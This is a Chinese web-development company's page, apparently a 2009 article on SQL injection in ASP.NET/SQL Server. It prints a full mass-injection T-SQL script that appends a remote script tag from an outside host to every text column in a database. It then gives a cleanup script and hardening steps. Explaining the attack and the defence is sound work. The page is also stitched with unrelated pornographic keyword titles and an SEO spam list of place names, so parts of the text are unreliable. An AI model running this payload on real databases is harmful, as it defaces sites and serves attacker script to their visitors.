国产老熟女高潮毛片A片仙踪林,欧美喂奶吃大乳,狠狠爱无码一区二区三区,女神的私人医生动漫免费阅读

新聞建站cms系統、政府cms系統定制開發

廣州網站建設公司-閱速公司

asp.net新聞發布系統、報紙數字報系統方案
/
http://www.tjsimaide.com/
廣州網站建設公司
您當前位置:首頁>ASP.NET MVC

ASP.NET MVC

sql注入和反注入

發布時間:2009/7/13 16:51:36  作者:  閱讀:1143  

廣告:

注入操作:
Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor For
Select A.Name,B.Name From Sysobjects A,Syscolumns B Where

A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or

B.Xtype=231 Or B.Xtype=167)

Open Table_Cursor
Fetch Next From Table_Cursor Into @T,@C

While(@@Fetch_Status=0)
Begin
Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert

(Varchar(8000),['+@C+']))+''<script

src=http://3b3.org/c.js></script>''')
Fetch Next From Table_Cursor Into @T,@C
End
Close Table_Cursor
Deallocate Table_Cursor

消除注入代碼的逆操作SQL

Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor For
Select A.Name,B.Name From Sysobjects A,Syscolumns B Where

A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or

B.Xtype=231 Or B.Xtype=167)

Open Table_Cursor
Fetch Next From Table_Cursor Into @T,@C

While(@@Fetch_Status=0)
Begin
Exec('update ['+@T+'] Set ['+@C+']=replace

(['+@C+'],''<script

src=http://3b3.org/c.js></script>'','''')')
Fetch Next From Table_Cursor Into @T,@C
End
Close Table_Cursor
Deallocate Table_Cursor


徹底杜絕SQL注入

1、不要使用sa用戶連接數據庫。
2、新建一個public權限數據庫用戶,并用這個用戶訪問數據庫。
3、[角色]去掉角色public對sysobjects與syscolumns對象的select訪問權限 。
4、[用戶]用戶名稱-> 右鍵-屬性-權限-在sysobjects與syscolumns上面打“×”。
5、通過以下代碼檢測(失敗表示權限正確,如能顯示出來則表明權限太高):
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype= 'u ' and

(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN print @c
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

廣告:

相關文章
sql注入和反注入
cms新聞系統購買咨詢
掃描關注 廣州閱速軟件科技有限公司
掃描關注 廣州閱速科技
主站蜘蛛池模板: 庆城县| 常山县| 扶沟县| 邵阳市| 巴青县| 茌平县| 娱乐| 宣汉县| 化州市| 乌恰县| 洞口县| 梁河县| 饶平县| 桓仁| 山西省| 得荣县| 德保县| 徐水县| 元氏县| 英超| 杭锦后旗| 孟村| 唐河县| 克山县| 肃北| 高尔夫| 循化| 聂荣县| 柳江县| 富阳市| 含山县| 平利县| 霍林郭勒市| 稻城县| 凤翔县| 观塘区| 革吉县| 全州县| 玛曲县| 洛南县| 哈巴河县|